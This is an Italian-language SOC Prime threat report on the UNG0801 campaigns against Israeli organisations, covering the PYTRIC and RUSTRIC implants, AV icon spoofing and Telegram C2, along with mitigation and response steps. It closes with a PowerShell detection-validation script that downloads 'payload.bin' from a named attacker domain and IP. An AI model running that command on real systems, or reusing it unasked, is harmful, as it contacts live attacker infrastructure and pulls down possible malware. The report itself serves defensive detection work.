SOC Prime Bias: Critico

30 Dec 2025 13:40 UTC

UNG0801: Attività Minacciose Mirate a Israele Guidate da Spoofing delle Icone AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
UNG0801: Attività Minacciose Mirate a Israele Guidate da Spoofing delle Icone AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Il rapporto descrive due campagne collegate che utilizzano PDF e documenti Word malevoli per consegnare payload che simulano icone antivirus e prendono di mira organizzazioni israeliane. Un percorso rilascia PYTRIC, un impianto Python impacchettato con PyInstaller, mentre l’altro consegna RUSTRIC, un impianto basato su Rust lanciato tramite un documento Word con macro abilitate. Entrambi i payload raccolgono dettagli sull’host, eseguono comandi di sistema e sondano il software di sicurezza installato; PYTRIC include inoltre funzionalità distruttive. La consegna è guidata da allegati di spear-phishing e link ospitati sul cloud (incluso Dropbox), con Telegram utilizzato per il comando e controllo.

Indagine

SEQRITE Labs ha analizzato gli esche iniziali di phishing, estratto macro incorporate e ricostruito la catena di payload rilasciata. PYTRIC è stato confermato come un pacchetto PyInstaller con routine di scoperta e cancellazione file, e gli analisti hanno osservato le credenziali del bot Telegram associate a Backup2040. RUSTRIC è stato profilato come un binario Rust che controlla ventotto prodotti antivirus e attiva un payload codificato in esadecimale usando WMI. L’analisi dell’infrastruttura ha collegato la consegna a un link Dropbox e a un dominio che risolve a un indirizzo IP precedentemente legato a netvigil.org.

Mitigazione

Istruire gli utenti a trattare con cautela gli allegati PDF e Word non richiesti, specialmente i file presentati come strumenti di sicurezza o utility correlate agli antivirus. Configurare la sicurezza della posta elettronica per bloccare documenti con macro e per segnare o limitare gli URL che puntano a host di archiviazione cloud utilizzati per la consegna dei payload. Sugli endpoint, monitorare l’esecuzione di PyInstaller, la creazione di processi WMI insoliti e l’invocazione sospetta di utilità integrate come whoami, hostname e nslookup. Bloccare i domini e gli IP identificati come malevoli può ulteriormente interrompere il percorso di infezione.

Risposta

Se viene rilevata attività, isolare il sistema affetto, preservare i dati volatili e raccogliere i documenti malevoli per una selezione basata su hash. Fermare i processi sospetti avviati da WMI e rimuovere i payload rilasciati dalle posizioni comuni di staging, come la cartella Downloads. Eseguire una convalida forense per le attività di eliminazione o cancellazione file, reimpostare credenziali potenzialmente esposte e monitorare per le comunicazioni C2 su Telegram successive.

Flusso di Attacco

Esecuzione Simulativa

Prerequisito: la verifica preliminare della Telemetria & Baseline deve essere superata.

Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare esattamente la telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errata.

  • NarraziOne dell’attacco & Comandi:
    L’avversario ha pre-registrato il dominio stratioai.org e lo ha configurato per risolvere a 159.198.68.25 (un VPS compromesso). Usando un one-liner PowerShell, iniziano un beacon C2 che scarica un piccolo payload e poi mantiene una shell inversa persistente. La connessione uscente viene effettuata su HTTPS (porta 443) per mescolarsi con il traffico normale, ma il firewall registra l’IP di destinazione e la query DNS, soddisfacendo la regola sigma.

  • Script Test di Regressione:

    # -------------------------------------------------
    # Beacon C2 simulato per la validazione rilevamento
    # -------------------------------------------------
    # 1. Risolvere il dominio malevolo (forza query DNS)
    $maliciousDomain = "stratioai.org"
    $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
    Write-Host "Risolto $maliciousDomain a $($resolved -join ', ')"
    
    # 2. Stabilire connessione HTTPS all'IP malevolo (C2)
    $maliciousIP = "159.198.68.25"
    $url = "https://$maliciousDomain/payload.bin"
    
    try {
        $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
        Write-Host "Richiesta C2 riuscita, dimensione: $($response.ContentLength) byte"
    } catch {
        Write-Error "Richiesta C2 fallita: $_"
    }
    
    # 3. OPZIONALE: Mantenere vivo il canale per 30 secondi
    Start-Sleep -Seconds 30
    # -------------------------------------------------
  • Comandi di Pulizia:

    # Rimuovere eventuali file temporanei (nessuno creato in questo script)
    # Cancellare la cache DNS per evitare riutilizzo accidentale
    ipconfig /flushdns
    Write-Host "Pulizia completata."